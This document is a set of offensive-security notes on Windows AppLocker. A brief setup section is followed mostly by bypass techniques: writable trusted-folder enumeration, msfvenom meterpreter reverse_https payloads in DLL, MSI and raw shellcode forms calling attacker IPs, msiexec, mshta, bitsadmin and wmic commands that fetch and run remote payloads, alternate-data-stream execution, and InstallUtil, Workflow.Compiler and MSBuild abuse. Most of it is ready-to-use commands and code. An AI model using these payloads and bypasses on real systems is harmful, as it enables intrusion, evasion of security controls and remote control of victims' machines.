Enable AppLocker
In Group Policy Editor (gpedit) navigate to Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Application Control Policies and select the AppLocker
In the Properties menu, enable AppLocker rules for Executables, Windows Installer files, scripts, and packaged apps. DLL's can be enabled as well in Advanced Tab.
For each category, select Configured and Apply.
Now open one of the categories and right-click. Select "Create Default Rules".
Take the time to inspect each ruleset. When you're done run gpupdate /force
from an admin command prompt or powershell session. Below will be a few defense evasion techniques.
View Blocked Execution
EventViewer -> Applications and Services Logs -> Microsoft -> Windows -> AppLocker
Enumeration
Copy Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
Sysinternal Tools
Script to find trusted folders and output the permissions
Copy $tools = "C:\SysinternalsSuite"
C:\SysinternalsSuite\accesschk.exe "<USERNAME>" C:\Windows -wus -accepteula | out-file -FilePath C:/users/<USER>/Desktop/permissions.txt
foreach($line in Get-Content C:/users/<USER>/Desktop/permissions.txt) {
if($line.StartsWith("RW") -or $line.StartsWith("W"))
{
$line.Substring(3) | out-file -FilePath C:/users/<USER>/Desktop/files.txt -Append
}
}
foreach($file_path in Get-Content C:/users/<USER>/Desktop/files.txt){
if(Test-Path -Path $file_path -PathType Container)
{
cd $tools
icacls.exe $file_path | out-file -FilePath C:/users/<USER>/Desktop/folder-permissions.txt -Append
}
}
Found interesting folder path. Used in Trusted Folders example below.
Copy C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Dlna\DeviceIcons
**NT AUTHORITY\Authenticated Users:(OI)(CI)(F)**
BUILTIN\Users:(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
Trusted Folders
Creating a javascript POC to see if code execution is allowed in a folder. Saved as test.js in folder path mentioned above.
Copy var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
Execute script
The same concept applied to DLLs as well
Generate msfvenom dll
Copy sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -f dll -o msfdll.dll
copy to whitelisted folder and run
Copy rundll32 C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Dlna\DeviceIconsmsfdll.dll,run
Bypass MSI
Generate payload
Copy root@kali: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -f msi -o /var/www/html/msi_payload.msi
On Victim
Copy msiexec /q/i http://192.168.49.115/msi_payload.msi
Alternate Data Stream
Create alternate data stream to readable and writeable file
Copy type test.js > "C:\Users\Rick.Sanchez\Random_log.log:test.js"
Opening the file will execute primary stream. Using the following command will execute the ADS
Copy wscript "C:\Users\Rick.Sanchez\Random_log.log:test.js"
Getting a Shell with ADS
generate raw payload
Copy msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -b '\\x00\\x0a\\x0d' -f raw > rawsc.bin
Create jscript payload with SuperSharpShooter
Copy ./SuperSharpShooter.py --dotnetver 4 --payload js --rawscfile rawsc.bin --output test --stageless
create alternate data stream to readable and writeable file (TeamViewer Log)
Copy type test.js > "C:\Users\Rick.Sanchez\Random_log.log:test.js"
Opening file will execute primary stream. using the following command will execute the ADS
Copy wscript "C:\Users\Rick.Sanchez\Random_log.log"
UninstallUtil
A combination of AppLocker and CLM bypass
Note: you must add a reference before compiling.
Copy C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
Copy using System ;
using System . Management . Automation ;
using System . Management . Automation . Runspaces ;
using System . Configuration . Install ;
namespace Bypass
{
class Program
{
static void Main ( string [] args)
{
Console . WriteLine ( "This is the main method which is a decoy" );
}
}
[ System . ComponentModel . RunInstaller ( true )]
public class Sample : System . Configuration . Install . Installer
{
public override void Uninstall ( System . Collections . IDictionary savedState)
{
//String cmd = "REPLACE ME WITH PAYLOAD"
String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Users\\Rick.Sanchez\\test.txt";
Runspace rs = RunspaceFactory . CreateRunspace ();
rs . Open ();
PowerShell ps = PowerShell . Create ();
ps . Runspace = rs;
ps . AddScript (cmd);
ps . Invoke ();
rs . Close ();
}
Using Uninstalls to bypass Applocker and bitsadmin to transfer file
Copy Attacker > certutil -encode C:\Users\Rick.Sanchez\Bypass.exe bypass.txt
Target > bitsadmin /Transfer myJob http://192.168.0.1/bypass.txt C:\Users\Rick.Sanchez\bypass.txt
Target > certutil -decode C:\Users\Rick.Sanchez\bypass.txt C:\Users\Rick.Sanchez\bypass.exe && del C:\Users\Rick.Sanchez\bypass.txt
Target > C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Users\Rick.Sanchez\Bypass.exe
Microsoft.Workflow.Compiler.exe
Payload is C# code as txt file
Copy using System;
using System.Diagnostics;
using System.Workflow.ComponentModel;
public class Run : Activity{
public Run() {
Process process = new Process();
// Configure the process using the StartInfo properties.
process.StartInfo.FileName = "powershell.exe";
process.StartInfo.Arguments = "powershell.exe -enc <ENCODED PS Payload>";
process.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
process.Start();
process.WaitForExit();
Console.WriteLine("I executed!");
}
}
Commands to run
Copy $workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "C:\Users\Rick.Sanchez\test.txt"
$output = "C:\Users\Rick.Sanchez\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output
$Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“Rick.Sanchez”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Users\Rick.Sanchez\run.xml C:\Users\Rick.Sanchez\results.xml
MSBUILD
Using XML Template from here
https://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
Execute Payload
Copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\Rick.Sanchez\Desktop\evil.xml
MSHTA
Copy mshta.exe http://192.168.0.1/test.hta
Test.hta file on Web Server will open cmd.exe
Copy < html >
< head >
< script language = "JScript" >
<!--- PASTE JSCRIPT PAYLOAD BELOW --->
var shell = new ActiveXObject ( "WScript.Shell" );
var res = shell .Run ( "cmd.exe" );
<!--- PASTE JSCRIPT ABOVE --->
</ script >
</ head >
< body >
< script language = "JScript" >
self .close ();
</ script >
</ body >
</ html >
The MSHTA.exe filepath used is a x64 exe
Generate payload
Copy sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.115 LPORT=443 -b '\\x00\\x0a\\x0d' -f raw > rawsc.bin
SuperSharpShooter
Copy ./SuperSharpShooter.py --dotnetver 4 --payload js --rawscfile rawsc.bin --output test --stageless
Copy Jscript payload created into test.hta template
WMIC
On Target
Copy wmic process get brief /format:"http://192.168.0.1/test.xsl"
XSL Template
Copy <?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
r.Run("cmd.exe");
]]>
</ms:script>
</stylesheet>